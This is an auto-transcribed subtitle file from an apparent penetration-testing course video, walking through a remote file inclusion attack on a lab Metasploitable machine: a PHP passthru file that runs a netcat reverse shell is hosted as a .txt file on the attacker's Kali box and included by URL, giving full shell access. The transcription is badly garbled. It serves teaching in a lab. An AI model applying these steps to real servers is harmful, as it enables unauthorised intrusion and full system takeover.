1
00:00:00,970 --> 00:00:08,050
Just like we did before and the last video we put five times back and then we put ATC password to access

2
00:00:08,050 --> 00:00:09,400
the password file.

3
00:00:09,580 --> 00:00:15,200
What we're going to do today is we're going to try to access a file located on a different server.

4
00:00:15,340 --> 00:00:21,640
So if you're doing this Penn test on an actual web server then you need to store the file that you want

5
00:00:21,640 --> 00:00:27,720
to access needs to be stored on a place with a real IP address or with a domain name.

6
00:00:27,730 --> 00:00:33,280
I'm doing this on my local server so I'm going to store this on the on the web server on the Kali machine

7
00:00:33,280 --> 00:00:35,520
on the 10 2014 to 0 3.

8
00:00:35,530 --> 00:00:43,930
This is 10 20 40 into 4 and I'm going to store my file on 10 2014 two or three so that file as I said

9
00:00:43,930 --> 00:00:46,000
can be anything it could be a web shell.

10
00:00:46,000 --> 00:00:47,910
It could be a payload.

11
00:00:47,920 --> 00:00:52,540
Well what I'm going to do is I'm going to create a very simple BHP file.

12
00:00:52,720 --> 00:00:56,320
So this is just a page for you start and end of the file.

13
00:00:56,530 --> 00:01:00,520
And what I'm going to put in the file I'm going to use of a function called pass through.

14
00:01:01,420 --> 00:01:04,180
And in that function basically what this function does.

15
00:01:04,180 --> 00:01:12,190
It executes operating system commands so it executes Windows Linux or depending on the web server it's

16
00:01:12,190 --> 00:01:19,550
going to execute commands related to that so you put the command here between the two quotation marks

17
00:01:19,910 --> 00:01:24,830
and I'm going to use the same command we used with the code execution version of vulnerability which

18
00:01:24,830 --> 00:01:31,910
was the net cat command which allowed us to get a connection or reverse connection from our target.

19
00:01:32,270 --> 00:01:34,460
So going to start here.

20
00:01:34,550 --> 00:01:36,230
So let's just first have a look on this.

21
00:01:36,230 --> 00:01:44,120
So BHP in the end these are just the start and the end of the file of the BHP file pass through is a

22
00:01:44,120 --> 00:01:50,000
function that I'm going to use which executes any command that's inserted between the quotations and

23
00:01:50,000 --> 00:01:56,000
I'm using the same command that we used in the command execution vulnerability which will just do a

24
00:01:56,000 --> 00:01:59,310
reverse connection to my computer.

25
00:01:59,320 --> 00:02:00,220
So this is all good.

26
00:02:00,220 --> 00:02:02,690
Now the next step is the most important step.

27
00:02:02,860 --> 00:02:04,570
And it's stored in this file.

28
00:02:04,570 --> 00:02:12,410
So as I said if your target was a remote web server then you should be star in this file in a place

29
00:02:12,590 --> 00:02:16,910
with a real IP where you can access it from the remote web server.

30
00:02:16,910 --> 00:02:22,670
Now I'm going to be X trying to access this from my meters political machine which is able to access

31
00:02:22,670 --> 00:02:27,950
files stored on the county machine because they're both on the same network and I'm going to be calling

32
00:02:27,950 --> 00:02:31,930
this I'm gonna be storing it in my var w w w hasty AML.

33
00:02:32,000 --> 00:02:32,690
So it's starting.

34
00:02:32,780 --> 00:02:36,160
It's being stored on the county not on the myth exploitable.

35
00:02:36,170 --> 00:02:45,710
And I'm gonna call it reverse and I'm gonna save it as GST not BHP and I'm doing this if I started as

36
00:02:45,710 --> 00:02:50,280
a BHP it is going to be executed on the candy machine.

37
00:02:50,300 --> 00:02:54,730
So it's going to create a reverse connection from the candy machine and I don't want that.

38
00:02:54,740 --> 00:02:59,180
I don't want to have the killing machine I actually already have access to the candy machine the one

39
00:02:59,180 --> 00:03:04,770
that I want to hack is the myth exploitable machine and that one is stored remotely.

40
00:03:04,850 --> 00:03:12,590
So in order to be able to include the IP HP code and executed on the remote machine we're gonna use

41
00:03:12,590 --> 00:03:19,220
it as GST and get it executed are the methods political machine and instead of executed on my tally.

42
00:03:19,790 --> 00:03:26,820
So I'm I'm starting it as a GST and I'm going to say save it and now let's just see here so if I go

43
00:03:26,820 --> 00:03:36,900
to my local host and if I say reverse the THC we'll see our file right here.

44
00:03:36,910 --> 00:03:42,310
So again this is on my local host which is not the most exploitable machine.

45
00:03:42,310 --> 00:03:49,990
It's 10 20 40 into 0 3 and the meter deployable is on 2 0 4.

46
00:03:50,040 --> 00:03:55,530
So how are we going to run this first let me just listen for connections like we did before.

47
00:03:55,590 --> 00:03:58,830
So it's just going to be net cat.

48
00:03:58,990 --> 00:04:10,430
The the LDP 1880 and then right here instead of including a file on the same server I'm going to include

49
00:04:10,430 --> 00:04:14,480
a remote file and the command is going to be hazed TTP.

50
00:04:14,510 --> 00:04:21,950
So it's just going to be the link to this file so we can access the file here as GHC gonna copied and

51
00:04:21,950 --> 00:04:22,780
pasted here

52
00:04:27,420 --> 00:04:33,600
and also in some cases you might need to add a question mark to the end to get this file to be executed

53
00:04:33,650 --> 00:04:34,550
RSP HP.

54
00:04:35,280 --> 00:04:40,950
So I'm just gonna go over this again for one more time including a remote file which is on a remote

55
00:04:40,950 --> 00:04:41,600
server.

56
00:04:41,700 --> 00:04:48,840
Make sure the remote server is accessible by your target and also make sure you start as GST because

57
00:04:48,840 --> 00:04:54,840
if you keep it as BHP this file the reverse file will be executed on the remote server so it will be

58
00:04:54,840 --> 00:04:58,850
executed on the 2 0 3 instead of being executed on the 2 0 4.

59
00:04:59,610 --> 00:05:01,270
And I'm keeping it at 60.

60
00:05:01,350 --> 00:05:02,790
This way it'll be great.

61
00:05:02,850 --> 00:05:09,030
It's gonna be executed on the two or four and it's gonna give me a remote connection to this computer

62
00:05:09,650 --> 00:05:11,880
to the mute exploitable computer.

63
00:05:12,150 --> 00:05:15,840
So if I come back here as you can see we have a remote connection.

64
00:05:15,840 --> 00:05:23,100
If we do a you name a you'll see that this is the meter's potable machine not the tally machine.

65
00:05:23,100 --> 00:05:29,370
So we basically have full access to the most exploitable machine through and a remote file inclusion

66
00:05:29,370 --> 00:05:30,510
vulnerability.

67
00:05:30,510 --> 00:05:36,960
Now if we do an atlas we can do a p WD to see where we are and we can literally run and in the next

68
00:05:36,960 --> 00:05:37,740
command we want.

69
00:05:37,740 --> 00:05:40,260
Now on the machine and do anything we want.

70
00:05:40,260 --> 00:05:42,450
Basically we have full access to that machine.